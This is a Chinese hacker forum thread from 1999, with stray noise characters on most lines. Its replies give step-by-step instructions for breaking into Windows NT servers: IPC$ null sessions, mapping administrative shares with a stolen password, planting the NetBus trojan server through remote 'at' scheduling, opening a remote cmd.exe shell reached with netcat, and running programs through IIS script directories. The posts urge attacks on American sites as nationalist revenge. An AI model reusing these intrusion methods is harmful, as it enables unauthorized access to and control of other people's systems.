《版主页黑客工具和文章的几个问题》中提到:" u6 ~2 M r" {# x5 ^$ n
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
- l( X- z' T8 ]0 m( {* V> 我的机子MMX166,WIN98,2。5G,32M内存。
/ I, W+ I1 z. z$ `7 J g
6 |) Q* o) ~$ v3 y8 X) i3 ?黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
* E- |- n- i% \2 A你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
4 T) @) d3 K, L: v1 }0 ^其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:
! W# {$ S% z, z1 k0 V: R* rnet use \\111.111.111.111\ipc$ "" /user:""
/ T n+ V! c4 Z( M3 t1 Y5 H& y! u0 j. a; [+ nnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
3 ]6 p: z7 u6 a! q- B" Bnet view \\111.111.111.111
0 h0 _4 x6 K( a, m- o3 o$ c当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:
+ G r2 o( S: `) b, onet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"- l/ X, Q. W0 j1 a' X; U: F7 x/ }
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
; w0 ]) @4 V& {+ B+ [1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
2 c) \* U% D* c; u* c% Snet use x: \\111.111.111.111\c$' H' k( H+ \ p, L4 ?( m
net use y: \\111.111.111.111\d$: h7 M: r w: c, [) n, k0 r% E0 b
这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
6 W. m" |! t8 n- U2、管理目标NT的用户:
3 {5 C7 t1 e r从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
( k) n! R) Z+ V" R1 [键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样0 t9 `+ ?7 d9 N( h8 ]8 e+ R
3、管理目标NT的服务( V* T2 N! X( I& h
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
1 c% v- d9 d# U, @这样你可以管理目标NT上的服务,共享目录9 V' u2 t5 N+ D% V% s
4、IIS管理
+ F R. S% n3 {7 l5 i7 R. v选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
; s9 w* W) V# P% W4 \7 ]! n0 l; |目标NT的FTP、WWW服务你就可以重新配置
6 B8 a/ W6 z& g1 f5、事件管理/ l. S7 n2 P; Z* B9 {
“事件查看器”->连接到服务器->111.111.111.111: O' S0 l3 p' R0 w
4 |' G4 B% s, d! L3 f$ z" `还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。/ O+ o3 f' |2 ~
) H+ i. |9 l* \% Y# m5 {$ j当然,98,95也能做一些事情,但很麻烦,比如:
0 `: P/ \3 U0 U% D6 \7 E" h8 ?net use \\111.111.111.111\ipc$
* o1 @+ X3 I' [. ]7 ^net use z: \\111.111.111.111\d$
* d& B' b8 Y/ z' O( T但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等
$ x9 @& n ]: O1 i
) v+ g1 r: e2 ~3 [8 x* z& H P+ h我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!
( s( C$ }/ v) E这样,你还可以了解目标机器上能有什么东东供你去用!. x" e9 W: Q( i/ q0 Z. T+ p
0 M$ o' b% X+ N; N1 S
( t/ a1 m$ B: j, o" \& Z$ ]--------------------------------------------------------------------------------% ?- ~* R O: u; C3 T3 t
' [ ]% G( |: Y" u( g5 G& R) j
>quack于1999-06-12,23:37:445 T3 r4 }* y7 E7 A7 `; {0 @/ G
在大作《几个有关黑的问题》中提到:3 W8 E$ m0 `; q( P
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。" w8 M3 R' m6 m% Z0 l
& C. i$ {8 }, Q4 Kkillusa于1999-06-13,03:25:15
& h* O ^! e+ B在大作《Re: 几个有关黑的问题》中提到:
, s8 Z6 {8 k+ q+ ^7 w# |1 h' U! d+ |* Z
letmein.exe 暂时没有mypwd参数,十分抱歉
; t5 y! a' v) Q5 j% h4 M; dpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。% |7 ^6 O* q/ M- ?
! t8 i2 P4 h% X6 ~, L) }3 ]0 @" ^Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
~ i8 y# n: g+ a$ }4 P- u3 N服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:' e0 n" z7 O7 |6 F) n1 o3 m) |1 u
: d9 f4 y5 l0 x# w6 B1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
2 h; A, R% `2 v3 q, i4 G2 g: e* [4 _' X
C:\>net start schedule
# u: V5 N) t, `9 G. I; cSchedule 正在启动服务.....: Y% Y( _& j; F. v/ I
Schedulw 服务启动成功。
1 h7 ]" S% j* KC:\>at /?1 l! b8 g' e2 W3 e; ?+ G
AT 命令排定在特定的日期和时间运行某些命令和程序。
0 S/ g$ E, V9 o" ]$ ~" F运行 AT 命令之前必须先启动 Schedule 服务。0 o4 h, r' A9 s( ?1 ]# {! P
8 r2 r" m. G4 }2 n) ?! F* W+ i. | TAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
; y) N# P' f5 k, C1 p3 }7 w7 Z2 [AT [\\computername] time [/INTERACTIVE]* D4 F7 J: D/ R) A. Z7 M l2 |' o
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
1 g: M& R3 m6 F2 ]: N2 S7 f, I: P4 @0 }% R
\\computername 指定远程计算机。 如果省略这个参数4 e3 r+ G& V$ U6 H# P
命令会被排定在本机上运行。9 K$ W4 }& k' ]/ W
id 指定给排定进度命令的识别号。
0 v+ ]+ o; E" V: p9 [3 e$ d; q; c
; F- Z# |/ c4 a; ~/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
2 ]% p- m' V" ~/ S/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。3 S' E$ E* x0 G, H2 R+ ~
time 指定命令运行的时间。7 a6 d# d3 ^5 V
/interactive 允许作业在运行时,与用户通过桌面交互。
" Y+ W2 _# u$ ^6 p5 r
# Z' y% j) ^6 U, H/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
8 A$ U( I' G# v* I: P; ~* Q如果省略日期,则默认为在每月的本日运行。9 Q* s3 Z( I2 g( Z1 S: i/ t
. w I4 B V' X6 h/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。" b( X4 d& X, o% m
) o9 O u; k7 |/ t5 L3 X0 U"command" 准备运行的 Windows NT 命令或批处理文件。: o& v {0 Q! L$ W9 d6 Q ^4 ~
) L2 q, ]: m8 m! u
C:\>
: f) E$ g: f, {- p" N& G/ D t$ e% a$ `& c
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
2 S, n" n K% ~, `: [! v/ c; o- s; _1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"1 y0 l8 P9 y$ |; _ @
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start* c0 k9 I/ r' A, L F8 e; m [% ]" W0 r
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
+ R* h! O: i* t* d) ^( vat \\x.x.x.x 00:00 ntsrv.exe /port:643212 V& q% J/ h, q! O
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:/ m0 N) C4 f) \; R5 b: `) Q+ C
Microsoft(R) Windows NT(TM)" {9 b2 r7 z0 L4 p; T
(C) Copyright 1985-1996 Microsoft Corp.
) n C% F" M( C$ hC:\>
! |0 N e: o- y' k; @
4 z0 [4 E* N1 g6 j! t2、利用web启动ntsrv.exe或其他程序在目的服务器
V& F: o. o6 X+ Z0 H* ?
* @$ q3 r! C/ E, ?. M将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:! x% y& N/ e3 x8 G0 r
http://x.x.x.x/scripts/ntsrv.exe /port:64321
+ }; T7 K) S- C8 A" e/ M% ?或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321/ o' x c6 S8 T$ n8 p
该程序就启动了7 w+ O3 {; {4 q& ]# I
5 C; Y, _8 ?" E' B. V/ a2 j' N
我只提这几中方法!
) b2 X% R+ r$ P要成功,必须打好基础工,对操作系统充分了解!# P4 o4 X' @! R3 W! G7 S% L/ {5 g; H" L
. G- ^9 U3 Q0 Q" Q% n, ]) c$ K
|